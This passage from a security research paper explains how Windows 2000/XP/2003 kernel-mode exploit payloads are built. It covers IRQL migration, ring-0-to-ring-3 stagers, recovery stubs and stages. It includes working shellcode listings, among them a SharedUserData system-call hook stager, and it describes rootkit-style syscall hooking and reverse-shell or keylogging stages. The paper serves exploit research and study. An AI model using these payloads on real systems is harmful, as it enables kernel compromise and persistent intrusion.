As such, the offset into the string that is compared between 2000 and XP differs. For 2000, the offset is 0x10. For XP, the offset is 0x13. The end result of the resolution process is that if the payload is running on XP, the eax register will hold the address of nt!PsRemoveCreateThreadNotifyRoutine and if it's running on 2000 it will hold the address of nt!PsSetCreateThreadNotifyRoutine. 7. Copy the second stage payload Once the symbol has been resolved, the second stage payload is copied to the destination described in an earlier step. 8. Set up the notify routine entry If the payload is running on XP, a fake callback structure is manually inserted into the nt!PspCreateThreadNotifyRoutine array and the nt!PspCreateThreadNotifyRoutineCount is manually incremented. If the payload is running on 2000, a direct call to nt!PsSetCreateThreadNotifyRoutine is issued with the pointer to the copied second stage as the notify routine to be registered. A payload that implements the thread notify routine approach is shown below: 00000000 FC cld 00000001 A12CF1DFFF mov eax,[0xffdff12c] 00000006 48 dec eax 00000007 6631C0 xor ax,ax 0000000A 6681384D5A cmp word [eax],0x5a4d 0000000F 75F5 jnz 0x6 00000011 95 xchg eax,ebp 00000012 BF7002DFFF mov edi,0xffdf0270 00000017 803F01 cmp byte [edi],0x1 0000001A 66D1C7 rol di,1 0000001D 57 push edi 0000001E 750E jnz 0x2e 00000020 89F8 mov eax,edi 00000022 83C008 add eax,byte +0x8 00000025 AB stosd 00000026 AB stosd 00000027 57 push edi 00000028 6A06 push byte +0x6 0000002A 6A13 push byte +0x13 0000002C EB05 jmp short 0x33 0000002E 57 push edi 0000002F 6A81 push byte -0x7f 00000031 6A10 push byte +0x10 00000033 5A pop edx 00000034 31C9 xor ecx,ecx 00000036 8B7D3C mov edi,[ebp+0x3c] 00000039 8B7C3D78 mov edi,[ebp+edi+0x78] 0000003D 01EF add edi,ebp 0000003F 8B7720 mov esi,[edi+0x20] 00000042 01EE add esi,ebp 00000044 AD lodsd 00000045 41 inc ecx 00000046 01E8 add eax,ebp 00000048 813C10644E6F74 cmp dword [eax+edx],0x746f4e64 0000004F 75F3 jnz 
0x44 00000051 49 dec ecx 00000052 8B5F24 mov ebx,[edi+0x24] 00000055 01EB add ebx,ebp 00000057 668B0C4B mov cx,[ebx+ecx*2] 0000005B 8B5F1C mov ebx,[edi+0x1c] 0000005E 01EB add ebx,ebp 00000060 8B048B mov eax,[ebx+ecx*4] 00000063 01E8 add eax,ebp 00000065 59 pop ecx 00000066 85C9 test ecx,ecx 00000068 8B1C08 mov ebx,[eax+ecx] 0000006B EB14 jmp short 0x81 0000006D 5E pop esi 0000006E 5F pop edi 0000006F 6A01 push byte +0x1 00000071 59 pop ecx 00000072 F3A5 rep movsd 00000074 7808 js 0x7e 00000076 5F pop edi 00000077 893B mov [ebx],edi 00000079 FF4320 inc dword [ebx+0x20] 0000007C EB02 jmp short 0x80 0000007E FFD0 call eax 00000080 C3 ret 00000081 E8E7FFFFFF call 0x6d ... R0 stage here ... The R0 stage must keep in mind that it will be called in the context of a callback, so in order to ensure graceful recovery the stage must issue a ret 0xc or equivalent instruction upon completion. The R0 stage must also be capable of being re-entered without having any adverse side effects. This approach may also be compatible with 2003, but tests were not performed. This payload could be made significantly smaller if it were targeted to a specific OS version. One major benefit to this approach is that the stage will be passed arguments that are very useful for R3 code injection, such as a ProcessId and ThreadId. This approach has quite a few cons. First, the size of the payload alone makes it less useful due to all the work required to just migrate to a safe IRQL. Furthermore, this payload also relies on offsets that may be unreliable across new versions of the operating system, specifically on XP. It also depends on the pages that the notify routine array resides at being paged in at the time of the registration. If they are not, the payload will fail if it is running at a raised IRQL that does not permit page faults. 
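The name comparison described in step 6 can be modeled outside of the kernel. The following Python sketch is an illustration only and is not part of the payload: the abbreviated export list and the helper names name_matches and find_export are hypothetical, while the "dNot" constant and the 0x10 and 0x13 offsets are taken from the listing above. It assumes nothing about the order or contents of the real export table.

```python
import struct

# ASCII "dNot" read as a little-endian dword; this is the constant used by
# `cmp dword [eax+edx],0x746f4e64` in the listing.
NEEDLE = 0x746F4E64

# Offsets into the export name, as pushed by the payload for each platform.
OFFSET_2000 = 0x10  # intended to match PsSetCreateThreadNotifyRoutine
OFFSET_XP = 0x13    # intended to match PsRemoveCreateThreadNotifyRoutine

# Hypothetical, abbreviated stand-in for the export name table of nt.
EXPORT_NAMES = [
    b"PsLookupProcessByProcessId",
    b"PsRemoveCreateThreadNotifyRoutine",
    b"PsSetCreateProcessNotifyRoutine",
    b"PsSetCreateThreadNotifyRoutine",
    b"PsTerminateSystemThread",
]


def name_matches(name, offset):
    """Return True if the four bytes at `offset` in `name` spell "dNot"."""
    chunk = name[offset:offset + 4]
    return len(chunk) == 4 and struct.unpack("<I", chunk)[0] == NEEDLE


def find_export(names, offset):
    """Return the index of the first name that matches, or None."""
    for index, name in enumerate(names):
        if name_matches(name, offset):
            return index
    return None
```

Using a different offset per platform lets a single four-byte constant select two different symbols, which is why the payload only has to vary the value it pushes for edx.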
4.1.4) Hooking Object Type Initializer Procedures

One theoretical way to migrate to a safe IRQL would be to hook one of the generalized object type initializer procedures associated with a specific object type, such as nt!PsThreadType or nt!PsProcessType. These procedures can be found in the OBJECT_TYPE_INITIALIZER structure. The method taken to do this would be to first resolve one of the exported object types and then alter one of the procedure attributes, such as the OpenProcedure, to point into a buffer that contains the payload to execute. The payload could then determine whether or not it is safe to execute based on the current IRQL. It may also be safe, in some cases, to assume that the IRQL will be PASSIVE_LEVEL for a given object type procedure. Matt Conover also describes how this can be done in his Malware Profiling and Rootkit Detection on Windows paper. Thanks to Derek Soeder for suggesting this approach.

4.1.5) Hooking KfRaiseIrql

This approach, suggested by Derek Soeder, could be quite reliable as an IRQL migration component. The basic concept would be to resolve and hook hal!KfRaiseIrql. Inside the hook routine, a check could be performed to see if the current IRQL is passive and, if so, run the rest of the payload. However, as Derek points out, one of the problems with this approach centers around the method used to hook the function, considering it would be somewhat expensive to do a detours-style preamble hook (although it is fairly easy to disable write protection). Still, this approach shows a good line of thinking that could be used to get to a safe IRQL.

4.2) Stagers

The stager payload component is designed to set up the execution of a separate payload either at R0 or R3.
This payload component is pretty much equivalent to the concept of stagers in user-mode payloads, but instead of reading in a payload off the wire for execution, R0 stagers typically have the staged payload tacked on to the stager already, since there is no elegant method of reading in a second stage from the network without consuming a lot of space in the process. This section will describe some of the techniques that can be used to execute a stage at either R0 or R3. The techniques that are theoretical and do not have proof of concept code will be described as such.

Although most stagers involve reading more code in off the wire, it could also be possible to write an egghunt style stager that searches the address space for an egg that is prepended or appended to the code that should be executed. The only requirement would be that there be some way to get the second stage somewhere in the address space for a long enough period of time. Given the right conditions, this approach for staging can be quite useful because it reduces the size of the initial payload that has to be transmitted or included as part of the exploitation request.

4.2.1) System Call Return Address Overwrite

A potentially useful way to stage code to R3 would be to hook the system call MSR and then alter the return address on the R3 stack to point to the stage that is to be executed. This would mean that whenever a system call occurred, the return path would bounce through the stage and then into the actual return address. This is an interesting vantage point for stages because it could give them the ability to filter data that is passed back to actual processes. This could potentially make it possible for an attacker to install a very simple memory-resident rootkit as a result of taking advantage of a vulnerability. This approach is purely theoretical, but it is thought that it could be made to work without very much overhead.
The basic implementation for such a stager would be to first copy the staged payload to a globally accessible location, such as SharedUserData. Once copied, the next step would be to hook the processor MSR for the system call instruction. When called, the hook routine for the system call instruction would alter the return address on the user-mode stack to point to the stage's global address, and should also make it possible for the stage to restore execution to the actual return address after it has completed. Once the return address has been redirected, the actual system call can be issued. When the system call returns, it would execute the stage. The stage, once completed, would then restore registers, such as eax, and transfer control to the actual return address.

This approach would be very transparent and should be completely reliable. The added benefit of being able to filter system call results makes it very interesting from a memory-resident rootkit perspective.

4.2.2) Thread APC

One of the most logical ways to go about staging a payload from R0 to R3 is through the use of Asynchronous Procedure Calls (APCs). The purpose of an APC is to allow code to be executed in the context of an existing thread without disrupting the normal course of execution for the thread. As such, it happens to be very useful for R0 payloads that want to run an R3 payload. This is the technique that was discussed at length in eEye's paper.

A few steps are required to accomplish this. First, the R3 payload must be copied to a location that will be accessible from a user-mode process, such as SharedUserData. After the copy has completed, the next step is to locate the thread that the APC should be queued to. There are a few important things to keep in mind in this step. For instance, it is likely the case that the R3 payload will want to be run in the context of a privileged process. As such, a privileged process must first be located and a thread running within it must be found.
Secondly, the thread that will have the APC queued to it must be in the alertable state, otherwise the APC insertion will fail. Once a suitable thread has been located, the final step is to initialize the APC and point the APC routine to the user-mode equivalent address via nt!KeInitializeApc and insert it into the thread's APC queue via nt!KeInsertQueueApc. After that has completed, the code will be run in the context of the thread that the APC was queued to and all will be well.

One of the major concerns about this type of approach is that it will generally have to rely on undocumented offsets for fields in structures like EPROCESS and ETHREAD that are very volatile across operating system versions. As such, making a portable payload that uses this technique is perfectly feasible, but it may come at the cost of size due to the requirement of factoring in different offsets and detecting the version at runtime.

The approach outlined by eEye works perfectly fine and is well thought out, and as such this subsection will merely describe ways in which it might be possible to improve the existing implementation. One way in which it might be optimized would be to eliminate the call to nt!PsLookupProcessByProcessId, but as their paper points out, this would only be possible for vulnerabilities that are triggered outside of the context of the Idle process. However, for cases where this is not a limitation, it would be easier to extract the current thread's process directly. This can be accomplished through the following disassembly, which may not be safe if the KPRCB is not located immediately after the KPCR:

00000000  A124F1DFFF      mov eax,[0xffdff124]
00000005  8B4044          mov eax,[eax+0x44]

After the process has been extracted, enumeration to find a privileged system process could be done in exactly the same manner as the paper describes (by enumerating the ActiveProcessLinks).
Another improvement that might be made would be to use SharedUserData as a storage location for the initialized KAPC structure rather than allocating storage for it with nt!ExAllocatePool. This would save some space by eliminating the need to resolve and call nt!ExAllocatePool. While the approach outlined in the paper describes nt!ExAllocatePool as being used to stage the payload to an IRQL safe buffer, it would be equally feasible to do so by using nt!SharedUserData for storage.

4.2.3) User-mode Function Pointer Hook

If a vulnerability is triggered in the context of a process, then the doors open up to a wide array of possibilities. For instance, the FastPebLockRoutine could be hooked to call into some code that is present in SharedUserData prior to calling the real lock routine. This is just one example of the different types of function pointers that could be hooked relative to a process.

4.2.4) SharedUserData SystemCall Hook

+------------+-----------------+
| Type:      | R0 to R3 Stager |
| Size:      | 68 bytes        |
| Compat:    | XP, 2003        |
| Migration: | Not necessary   |
+------------+-----------------+

One particularly useful approach to staging an R3 payload from R0 is to hijack the system call dispatcher at R3. To accomplish this, one must have an understanding of the basic mechanism through which system calls are dispatched in user-mode. Prior to Windows XP, system calls were dispatched through the soft-interrupt 0x2e. As such, the method described in this subsection will not work on Windows 2000. However, starting with XP SP0, the system call interface was changed to support using processor-specific instructions for system calls, such as sysenter or syscall. To support this, Microsoft added fields to the KUSER_SHARED_DATA structure, which is symbolically known as SharedUserData, that held instructions for issuing a system call.
These instructions were placed at offset 0x300 by the kernel and took a form like the code shown below:

kd> dt _KUSER_SHARED_DATA 0x7ffe0000
   ...
   +0x300 SystemCall       : [4] 0xc819cc3`340fd48b
kd> u SharedUserData!SystemCallStub L3
SharedUserData!SystemCallStub:
7ffe0300 8bd4             mov     edx,esp
7ffe0302 0f34             sysenter
7ffe0304 c3               ret

To make use of this dynamic code block, each system call stub in ntdll.dll was implemented to make a call into the instructions found at that location.

ntdll!ZwAllocateVirtualMemory:
77f7e4c3 b811000000       mov     eax,0x11
77f7e4c8 ba0003fe7f       mov     edx,0x7ffe0300
77f7e4cd ffd2             call    edx

Because SharedUserData contained executable instructions, the SharedUserData mapping had to be marked as executable. When Microsoft began work on some of the security enhancements included with XP SP2 and 2003 SP1, such as Data Execution Prevention (DEP), they presumably realized that leaving SharedUserData executable was largely unnecessary and that doing so left open the possibility for abuse. To address this, the fields in KUSER_SHARED_DATA were changed from sets of instructions to function pointers that resided within ntdll.dll. The output below shows this change:

   +0x300 SystemCall       : 0x7c90eb8b
   +0x304 SystemCallReturn : 0x7c90eb94
   +0x308 SystemCallPad    : [3] 0

To make use of the function pointers, each system call stub was changed to issue an indirect call through the SystemCall function pointer:

ntdll!ZwAllocateVirtualMemory:
7c90d4de b811000000       mov     eax,0x11
7c90d4e3 ba0003fe7f       mov     edx,0x7ffe0300
7c90d4e8 ff12             call    dword ptr [edx]

The importance behind the approaches taken to issue system calls is that it is possible to take advantage of the way in which the system call dispatching interfaces have been implemented. These interfaces can be manipulated in a manner that allows a payload to be staged from R0 to R3 with very little overhead.
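As a worked check of the two layouts shown above, the SystemCall value printed by the debugger on XP SP0 can be unpacked as a little-endian quadword to recover the stub bytes, and the same first two bytes can be used to tell the inline-stub layout apart from the function-pointer layout. The following Python sketch is illustrative only; the helper names stub_bytes and is_inline_stub are hypothetical, and the constants are copied from the debugger output above.

```python
import struct

# SystemCall as displayed by the debugger on XP SP0 (0xc819cc3`340fd48b).
XP_SP0_SYSTEMCALL = 0x0C819CC3340FD48B

# SystemCall as displayed on XP SP2, where it is a pointer into ntdll.dll.
XP_SP2_SYSTEMCALL = 0x7C90EB8B

# `mov edx,esp` (8b d4) read as a little-endian word.
MOV_EDX_ESP = 0xD48B


def stub_bytes(qword):
    """Return the eight bytes that the quadword occupies in memory."""
    return struct.pack("<Q", qword)


def is_inline_stub(data):
    """Return True if `data` begins with the bytes of `mov edx,esp`."""
    return struct.unpack("<H", data[:2])[0] == MOV_EDX_ESP


inline = stub_bytes(XP_SP0_SYSTEMCALL)
pointer = struct.pack("<I", XP_SP2_SYSTEMCALL)
```

The first five bytes of inline correspond to the three instructions in the SystemCallStub disassembly, while pointer begins with 8b eb and therefore does not look like the inline stub.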
The basic idea behind this approach is that an R3 payload is layered in between the system call stubs and the kernel. The R3 payload then gets an opportunity to run prior to a system call being issued within the context of an arbitrary process. This approach has quite a few advantages. First, the size of the staging payload is relatively small because it requires no symbol resolution or other means of directly scheduling the execution of code in an arbitrary or specific process. Second, the staging mechanism is inherently IRQL-safe because SharedUserData cannot be paged out. This benefit makes it such that a migration technique does not have to be employed in order to get the R0 payload to a safe IRQL.

One of the disadvantages of the payload outlined below is that it relies on SharedUserData being executable. However, it should be trivial to alter the PTE for SharedUserData to set the execute bit if necessary, thus eliminating the DEP concern.

Another thing to keep in mind about this stager is that the R3 payload must be written in a manner that allows it to be re-entrant. Since the R3 payload is layered between user-mode and kernel-mode for system call dispatching, it can be assumed that the payload will get called many times in many different process contexts. It is up to the R3 payload to figure out when it should do its magic and when it should not.

The following steps outline one way in which a stager of this type could be implemented.

1. Obtain the address of the R3 payload

   In order to prepare to copy the R3 payload to SharedUserData (or some other globally-accessible region), the address of the R3 payload must be determined in some arbitrary manner.

2. Copy the R3 payload to the global region

   After obtaining the address of the R3 payload, the next step would be to copy it to a globally accessible region. One such region would be in SharedUserData. This requires that SharedUserData be executable.

3. Determine OS version

   The method used to layer between system call stubs and the kernel differs between XP SP0/SP1 and XP SP2/2003 SP1. To determine whether or not the machine is XP SP0/SP1, a comparison can be made to see if the first two bytes found at 0xffdf0300 are equal to 0xd48b (which is equivalent to a mov edx, esp instruction). If they are equal, then the operating system is assumed to be XP SP0/SP1. Otherwise, it is assumed to be XP SP2+.

4. Hooking on XP SP0/SP1

   If the operating system version is XP SP0/SP1, hooking is accomplished by overwriting the first two bytes at 0xffdf0300 with a short jump instruction to some offset within SharedUserData that is not used, such as 0xffdf037c. Prior to doing this overwrite, a few instructions must be appended to the copied R3 payload that act as a method of restoring execution so that the original system call actually executes. This is accomplished by appending a mov edx, esp / mov ecx, 0x7ffe0302 / jmp ecx instruction set.

5. Hooking on XP SP2+

   If the operating system version is XP SP2 or later, hooking is accomplished by overwriting the function pointer found at offset 0x300 within SharedUserData. Prior to overwriting the function pointer, the original function pointer must be saved and an indirect jmp instruction must be appended to the copied R3 payload so that system calls can still be processed. The original function pointer can be saved to 0xffdf0308, which is currently defined as being used for padding. The jmp instruction can therefore indirectly acquire the original system call dispatcher address from 0x7ffe0308.

The following code illustrates an implementation of this type of staging payload. It's roughly 68 bytes in size, excluding the R3 payload and the recovery method.
00000000  EB3F            jmp short 0x41
00000002  BB0103DFFF      mov ebx,0xffdf0301
00000007  4B              dec ebx
00000008  FC              cld
00000009  8D7B7C          lea edi,[ebx+0x7c]
0000000C  5E              pop esi
0000000D  57              push edi
0000000E  6A01            push byte +0x1          ; number of dwords to copy
00000010  59              pop ecx
00000011  F3A5            rep movsd
00000013  B88BD4B902      mov eax,0x2b9d48b
00000018  663903          cmp [ebx],ax
0000001B  7511            jnz 0x2e
0000001D  AB              stosd
0000001E  B803FE7FFF      mov eax,0xff7ffe03
00000023  AB              stosd
00000024  B0E1            mov al,0xe1
00000026  AA              stosb
00000027  66C703EB7A      mov word [ebx],0x7aeb
0000002C  5F              pop edi
0000002D  C3              ret                     ; substitute with recovery method
0000002E  8B03            mov eax,[ebx]
00000030  8D4B08          lea ecx,[ebx+0x8]
00000033  8901            mov [ecx],eax
00000035  66C707FF25      mov word [edi],0x25ff
0000003A  894F02          mov [edi+0x2],ecx
0000003D  5F              pop edi
0000003E  893B            mov [ebx],edi
00000040  C3              ret                     ; substitute with recovery method
00000041  E8BCFFFFFF      call 0x2
... R3 payload here ...

4.3) Recovery

Another distinction between kernel-mode vulnerabilities and user-mode vulnerabilities is that it is not safe to simply let the kernel crash. If the kernel crashes, the box will blue screen and the payload that was transmitted may not even get a chance to run. As such, it is necessary to identify ways in which normal execution can be resumed after a kernel-mode vulnerability has been triggered. However, like most things in the kernel, the recovery method that can be used is highly dependent on the vulnerability in question, so it makes sense to have a few possible approaches. Chances are, though, that the methods listed in this document will not be enough to satisfy every situation and in many cases may not even be optimal. For this reason, kernel-mode exploit writers are encouraged to research more specific recovery methods when implementing an exploit. Regardless of these concerns, this section describes the general class of recovery payloads and identifies scenarios in which they may be most useful.
4.3.1) Thread Spinning

For situations where a vulnerability occurs in a non-critical kernel thread, it may be possible to simply cause the thread to spin or block indefinitely. This approach is very useful because it means that there is no requirement to gracefully restore execution in some manner. It basically skirts the issue of recovery altogether.

4.3.1.1) Delaying Thread Execution

This method was proposed by eEye and involved using nt!KeDelayExecutionThread as a way of blocking the calling thread without adversely impacting performance. Alternatively, if nt!KeDelayExecutionThread failed or returned, eEye implemented their payload in such a way as to cause it to spin while calling nt!KeYieldExecution each iteration. The approach that eEye suggests is perfectly fine, assuming the following minimum conditions are true:

  - Non-critical kernel thread
  - No exclusive locks (such as spin locks) are held by a calling frame

If any one of these conditions is not true, the act of spinning or otherwise blocking the thread from continuing normal execution could lead to a deadlock. If the setting is right, though, this method is perfectly acceptable. If the approach described by eEye is used, it will require the resolution of nt!KeDelayExecutionThread at a minimum, but could also require the resolution of nt!KeYieldExecution depending on how robust the recovery method is intended to be. The fact that this requires symbol resolution means that the payload will jump significantly in size if it does not already involve the resolution of symbols.

4.3.1.2) Spinning the Calling Thread

+---------------+-----------------+
| Type:         | R0 Recovery     |
| Size:         | 2 bytes         |
| Compat:       | All             |
| Migration:    | May be required |
| Requirements: | No held locks   |
+---------------+-----------------+

An alternative approach is to just spin the calling thread at PASSIVE_LEVEL.
If the conditions are right, this should not lead to a deadlock, but it is likely that performance will be adversely affected. The benefit is that it does not increase the size of the payload by much considering such an approach can be implemented in two bytes:

00000000  EBFE            jmp short 0x0

4.3.2) Throwing an Exception

+---------------+--------------------------------+
| Type:         | R0 Recovery                    |
| Size:         | 3 bytes                        |
| Compat:       | All                            |
| Migration:    | Not necessary                  |
| Requirements: | No held locks in wrapped frame |
+---------------+--------------------------------+

If a vulnerability occurs in the context of a frame that is wrapped in an exception handler, it may be possible to simply trigger an exception that will allow execution to continue like normal. Unfortunately, the chances of this recovery method being usable are very slim considering most vulnerabilities are likely to occur outside of the context of an exception wrapped frame. The usability of this approach can be tested fairly simply by triggering the overflow in such a way as to cause an exception to be thrown. If the machine does not crash, it could be the case that the vulnerability occurred in a function that is wrapped by an exception handler. Assuming this is the case, writing a payload that simply triggers an exception is fairly trivial.

00000000  31F6            xor esi,esi
00000002  AC              lodsb

4.3.3) Thread Restart

+---------------+-----------------+
| Type:         | R0 Recovery     |
| Size:         | 41 bytes        |
| Compat:       | 2000, XP        |
| Migration:    | May be required |
| Requirements: | No held locks   |
+---------------+-----------------+

If a vulnerability occurs in the context of a system worker thread, it may be possible to cause the thread to restart execution at its entry point without any major adverse side effects. This avoids the issue of having to restore normal execution for the context of the current call frame. To accomplish this, the StartAddress must be extracted from the calling thread's ETHREAD structure.
Due to the fact that this relies on the use of undocumented fields, it follows that portability could be a problem. The following table shows the offsets to the StartAddress routine for different operating system versions:

+------------------+---------------------+----------------------+
| Platform         | StartAddress Offset | Stack Restore Offset |
+------------------+---------------------+----------------------+
| Windows 2000 SP4 | 0x230               | 0x254                |
| Windows XP SP0   | 0x224               | 0x250                |
| Windows XP SP2   | 0x224               | 0x250                |
+------------------+---------------------+----------------------+

A payload that implements this approach that should be compatible with all of the above described offsets is shown below. Testing was only performed on XP SP0:

00000000  6A24            push byte +0x24
00000002  5B              pop ebx
00000003  FEC7            inc bh
00000005  648B13          mov edx,[fs:ebx]
00000008  FEC7            inc bh
0000000A  8B6218          mov esp,[edx+0x18]
0000000D  29DC            sub esp,ebx
0000000F  01D3            add ebx,edx
00000011  803D7002DFFF01  cmp byte [0xffdf0270],0x1
00000018  7C07            jl 0x21
0000001A  8B03            mov eax,[ebx]
0000001C  83EC2C          sub esp,byte +0x2c
0000001F  EB06            jmp short 0x27
00000021  8B430C          mov eax,[ebx+0xc]
00000024  83EC30          sub esp,byte +0x30
00000027  FFE0            jmp eax

This implementation works by first obtaining the current thread context through fs:0x124. Once obtained, a check is performed to see which operating system the payload is running on by looking at the NtMinorVersion attribute of the KUSER_SHARED_DATA structure. The reason this is necessary is because the offsets needed to obtain the StartAddress of the thread and the offset that is needed when restoring the stack are different depending on which operating system is being used. After resolving the StartAddress and adjusting the stack pointer to reflect what it would have been when the function was originally called, all that's required is to transfer control to the StartAddress.
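The offset arithmetic performed by the listing can be checked against the table with a short model. The following Python sketch only mirrors the register arithmetic of the disassembly above and touches no kernel state; the function name restart_offsets is hypothetical, and the argument stands in for the NtMinorVersion byte read from 0xffdf0270.

```python
def restart_offsets(nt_minor_version):
    """Model the constants computed by the Thread Restart payload.

    Returns a tuple of (fs offset of the current thread pointer,
    StartAddress offset within the thread, total stack restore offset).
    """
    ebx = 0x24                  # push byte +0x24 / pop ebx
    ebx += 0x100                # inc bh: ebx becomes 0x124
    current_thread_slot = ebx   # mov edx,[fs:ebx]
    ebx += 0x100                # inc bh: ebx becomes 0x224
    stack_restore = ebx         # sub esp,ebx

    if nt_minor_version < 1:    # jl 0x21: taken on Windows 2000
        start_address = ebx + 0xC   # mov eax,[ebx+0xc]
        stack_restore += 0x30       # sub esp,byte +0x30
    else:                       # fall through on XP
        start_address = ebx         # mov eax,[ebx]
        stack_restore += 0x2C       # sub esp,byte +0x2c

    return current_thread_slot, start_address, stack_restore
```

Building both constants from a single push of 0x24 and two inc bh instructions is what keeps the payload small: the same register supplies the fs offset, the base StartAddress offset, and most of the stack adjustment.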
This approach, at least in this specific implementation, may be closely tied to vulnerabilities that occur in system worker thread routines, specifically those that start at nt!ExpWorkerThread. However, the principles could be applied to other system worker threads if the illustrated implementation proves limited. It is also important to realize that since this method depends on undocumented version-specific offsets, it is likely that it will not be portable to new versions of the kernel. This approach should also be compatible with Windows 2003 Server SP0/SP1, but the offsets are likely to be different and have not been obtained or tested at this point.

4.3.4) Lock Release

Judging from some of the other recovery methods described in this document, it can be seen that one of the biggest limiting factors has to do with locks being held when recovery is attempted. To deal with this problem, one would have to implement a solution that was capable of releasing held locks prior to using a recovery method. This is more of a theoretical solution than a concrete one, but if it were possible to release locks held by a thread prior to recovery, then it would be possible to use some of the more elegant recovery methods. As it stands, though, the authors are not aware of a feasible solution to this problem that is capable of releasing the various types of locks in a general manner. Instead, it would most likely be better to attack this problem on a per-vulnerability basis rather than attempting to come up with an all-encompassing solution.

Without a proper lock releasing solution, it is likely that even if a vulnerability can be triggered, the box may deadlock. Again, this is highly dependent on the vulnerability in question, but it's not something that should be considered an academic concern.
4.4) Stages

The purpose of the stage payload component is to perform whatever arbitrary task is desired, whether it be to hook the keyboard and send key strokes to the attacker or to spawn a reverse shell in the context of a user-mode process. The definition of the stage component is broad enough to encompass pretty much any end-goal an attacker might have. For that reason, this section is relatively sparse on details and it is instead left up to the reader to decide what type of action they would like to perform. The paper eEye has provided shows some concrete examples of kernel-mode stages. There are also many examples of existing user-mode payloads that could be staged to run in the context of a user-mode process. In the future, stages will most likely be the focal point of kernel-mode payload research.

5) Conclusion

This document has illustrated some of the general techniques that can be used when implementing kernel-mode payloads. Examples have been provided for techniques that can be used to locate the base address of nt and an example routine has been provided to illustrate symbol resolution. To make kernel-mode payloads easier to grasp, their anatomy has been broken down into four distinct units that have been referred to as payload components. These four payload components can be combined together to form a logical kernel-mode payload.

The purpose of the migration payload component is to transition the processor to a safe IRQL so that the rest of the payload can be executed. In some cases, it's also necessary to make use of a stager payload component in order to move the payload to another thread context or location for the purpose of execution. Once the payload is at a safe IRQL and has been staged as necessary, the actual meat of the payload can be run. This portion of the payload is symbolically referred to as the stage payload component.
After everything is said and done, the kernel-mode payload has to find some way to ensure that the kernel does not crash. To accomplish this, a situational recovery payload component can be used to allow the kernel to continue to execute properly.

While the vectors taken to achieve code execution have not been described in this document, it is expected that there will continue to be research and improvements in this field. A cycle similar to that seen for user-mode vulnerabilities can be equally expected in the kernel-mode arena once enough interest is gained. With the eye of security vendors intently focused on solving the problem of user-mode software vulnerabilities, the kernel-mode arena will be a playground ripe for research and discovery.

Bibliography

Conover, Matt. Malware Profiling and Rootkit Detection on Windows.
http://xcon.xfocus.org/archives/2005/Xcon2005_Shok.pdf; accessed Dec. 12, 2005.

eEye Digital Security. Remote Windows Kernel Exploitation: Step into the Ring 0.
http://www.eeye.com/ data/publish/whitepapers/research/OT20050205.FILE.pdf; accessed Dec. 8, 2005.

skape. Safely Searching Process Virtual Address Space.
http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf; accessed Dec. 12, 2005.

SoBeIt. How to Exploit Windows Kernel Memory Pool.
http://packetstormsecurity.nl/Xcon2005/Xcon2005_SoBeIt.pdf; accessed Dec. 11, 2005.

System Inside. Sysenter.
http://system-inside.com/driver/sysenter/sysenter.html; accessed Nov. 23, 2005.